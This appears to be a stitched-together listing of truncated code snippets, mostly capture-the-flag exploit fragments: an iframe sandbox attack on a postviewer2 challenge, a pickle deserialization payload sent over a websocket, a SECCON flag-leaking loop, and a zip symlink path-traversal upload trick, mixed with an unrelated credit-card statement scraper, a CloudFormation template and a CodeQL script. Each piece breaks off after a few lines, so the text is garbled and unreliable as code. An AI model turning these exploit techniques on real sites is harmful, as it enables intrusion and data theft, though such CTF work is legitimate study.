| <body> | |
| <iframe id="frame1"></iframe> | |
| <iframe id="frame2"></iframe> | |
| <script> | |
| function arrayToBase36(arr) { | |
| return arr | |
| .reduce((a, b) => BigInt(256) * a + BigInt(b), BigInt(0)) | |
| .toString(36); | |
| } |
| // Locate this file in https://storage.googleapis.com | |
| const evaluatorHtml = ` | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>Evaluator</title> | |
| <script> | |
| onmessage = e => { |
| from http.server import HTTPServer | |
| from http.server import BaseHTTPRequestHandler | |
| import requests | |
| import sys | |
| import re | |
| import base64 | |
| import websocket | |
| import time | |
| import threading | |
| import json |
| meisai = [...document.querySelectorAll('#meisaiTable tbody tr')] | |
| .filter(tr => tr.id === '') | |
| .map(tr => [...tr.querySelectorAll('td')]) | |
| .map(tds => { | |
| const date = tds[1].textContent | |
| const content = tds[2].textContent | |
| const price = tds[7].textContent.replaceAll(/\s/gi, '') | |
| return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}` | |
| }) | |
| .join('\n') |
To solve the challenge we need to upload a symlink file in zipfile.
When we upload zipfile, it will be unzipped and then, symlink in zipfile will be deleted.
But if the entry name contains ../, symlink will not be deteled.
Therefore we create a symlink entry foo/../bar in zipfile.
| AWSTemplateFormatVersion: 2010-09-09 | |
| Description: A kick-ass cloud app for hacker movienights! | |
| Parameters: | |
| AppName: | |
| Type: String | |
| Default: api-movies | |
| Description: Name of application. | |
| StageName: | |
| Type: String | |
| Default: prod |
| <body> | |
| <script> | |
| const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time)) | |
| const frame = document.createElement('iframe'); | |
| frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
| document.body.appendChild(frame); | |
| const frame2 = document.createElement('iframe'); | |
| frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
| frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols') |
| from websocket import create_connection | |
| from base64 import b64encode, b64decode | |
| import pickle | |
| ticket = 'ticket{}' | |
| ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket]) | |
| PICKLE_OP_NAMES = { | |
| "MARK": '(', |
| REPO=$1 | |
| REPO_DIR=repos/$REPO/ | |
| rm -rf $REPO_DIR | |
| mkdir -p $REPO_DIR | |
| cd $REPO_DIR | |
| git clone --depth 1 "https://github.com/$REPO" | |
| curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip | |
| unzip -q codeqldb.zip | |
| codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download |
| <script> | |
| chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('') | |
| //chars = '_012345678'.split('') | |
| //chars = '9abcdefgh'.split('') | |
| //chars = 'ijklmnopq'.split('') | |
| //chars = 'rstuvwxyz}'.split('') | |
| let prefix = 'SECCON{' | |
| for (let char of chars) { | |
| setTimeout(() => { | |
| let trial = `${prefix}${char}` |